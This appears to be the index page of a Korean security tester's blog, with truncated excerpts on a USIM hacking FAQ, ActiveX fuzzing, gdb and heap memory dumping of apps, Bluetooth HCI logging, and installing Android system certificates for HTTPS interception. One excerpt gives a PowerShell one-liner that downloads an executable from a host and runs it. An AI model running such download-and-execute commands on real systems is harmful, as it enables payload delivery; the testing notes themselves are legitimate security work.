Jaden's Note Jaden's Note

최근 USIM 정보 해킹이 발생하여 사회적으로 이슈가 되고 있습니다.사고의 영향이 어디까지 발생할지 알 수 없지만, 대국민 서비스인 만큼 피해가 발생할 수 있는 사례를 미리 예방하기 위해 중요한 정보를 정리해보았습니다. Q. USIM 정보만 해커가 확보했을 경우, 폰 복제가 가능할까요?A. 아닙니다. IMEI 정보와 매칭되지 않을 경우 복제폰은 만들 수 없습니다. Q. 유심보호 서비스에만 가입하면 안전할까요?A. 유심보호 서비스는 일종의 이상현상을 탐지하는 서비스입니다. 서울에서 잡히던 신호가 갑자기 부산에서 잡힌다거나 안드로이드 폰에서 잡히던 신호가 애플 폰에서 잡힌다거나 하는 경우 이상현상으로 탐지하고 통신을 차단하는 서비스입니다. 일반적으로 해커는 복제폰 사용자의 사용 위치나 기기정보 등을 알 수 ..

COMRaider 사용 visual C++ 6.0 / tstcon32.exe 사용 powershell 을 이용한 파일 다운로드 & 파일 실행 한줄 명령어 cmd.exe /c powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.0.5/dashboard/Client.exe','C:\\abc.exe') & C:\\abc.exe 함수 사용 예시

netstat -tnlp lsof -i -nP

[메모리 덤프] 1. gdb 설치 2. ssh로 연결 > 대상 App의 PI 및 앱 저장경로 확인 (ps -ef | grep Appname) > PID를 이용하여 gdb Attach (gdb -p PID) > break point 설정으로 heap 구역 리턴값 확인 (gdb) b malloc : malloc에 breakpoint 설정 후 breakpoint 된 메모리 주소 확인 (gdb) c : 실행 (gdb) finish (gdb) i r r0 : into register 현재 레지스터 상태 확인 (r0 : return address 확인) (gdb) i mach-region 0x00000000 : 해당 주소의 memory map 및 구역의 속성 확인 (덤프 시작 주소 및 끝 주소 확인) (gdb) d..

1) windbg 설치 https://developer.microsoft.com/ko-kr/windows/downloads/windows-sdk/ Windows SDK - Windows 앱 개발 Windows SDK Windows 11용 Windows SDK(10.0.22000)는 Windows 애플리케이션을 빌드할 수 있는 최신 헤더, 라이브러리, 메타데이터, 도구를 제공합니다. 이 SDK를 사용하여 Windows 11 및 이전 Windows 릴리스용 UWP(유 developer.microsoft.com 2) adplus를 이용하여 crash dump 생성

1. 블루투스 활성화 2. 개발자 옵션 활성화 3. 개발자 옵션에서 Bluetooth HCI 스눕 설정 활성화 4. 블루투스 비활성화 및 다시 활성화 5. 재부팅 6. 개발자 옵션으로 돌아가서 버그리포트 실행 (전체보고서) 7. 로그 파일 확인 (버전별로 경로가 상이할 수 있음) - /data/misc/bluetooth/logs/btsnoop_hci.log - /data/log/bt/btsnoop_hci.log 이후, Wireshark를 이용하여 로그 오픈 및 분석

안드로이드 7.0 이상부터는 sd카드에 넣어서 인증서 설치가 불가능합니다. https 트래픽을 조작하기 위해서는 시스템 인증서에 넣어주어야 하기 때문에 아래와 같은 방식으로 진행해야합니다. 1) openssl for windows 설치 (Binaries - OpenSSLWiki) Binaries - OpenSSLWiki Some people have offered to provide OpenSSL binary distributions for selected operating systems. The condition to get a link here is that the link is stable and can provide continued support for OpenSSL for a while. No..

1. 루팅 2. PC로 디버깅 시 Heap 접근 권한 부여 $ adb shell setprop libc.debug.malloc 1 $ adb shell stop $ adb shell start 3. android studio의 ddms(android device monitor)을 사용해서 Heap 영역 접근 (Native Heap 이 활성화 되지 않은 경우 C:/Users/JW/.android/ddms.cfg 파일에 native=true 추가) 4. ddms에서 덤프뜨려는 앱 선택 후 DUMP HPROF File 클릭하여 다운로드 5. HPROF File을 표준 형식으로 변환 /android/sdk/platform-tools 경로에 가서 hprof-conv [HPROF 파일명] [표준형식으로 바꿀 파일명..